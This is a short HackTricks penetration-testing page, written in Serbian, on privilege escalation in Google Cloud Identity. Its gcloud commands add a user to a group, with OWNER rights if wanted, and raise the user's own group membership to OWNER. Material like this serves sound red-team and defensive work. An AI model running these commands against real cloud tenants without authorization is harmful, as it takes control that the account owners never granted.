GCP - Cloudidentity Privesc

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Cloudidentity

Za više informacija o cloudidentity servisu, proverite ovu stranicu:

GCP - IAM, Principals & Org Policies Enum

Dodajte se u grupu

Ako vaš korisnik ima dovoljno dozvola ili je grupa pogrešno konfigurisana, može se učlaniti u novu grupu:

bash
gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Izmeni članstvo u grupi

Ako vaš korisnik ima dovoljno dozvola ili je grupa pogrešno konfigurisana, može biti u mogućnosti da postane VLASNIK grupe čiji je član:

bash
# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks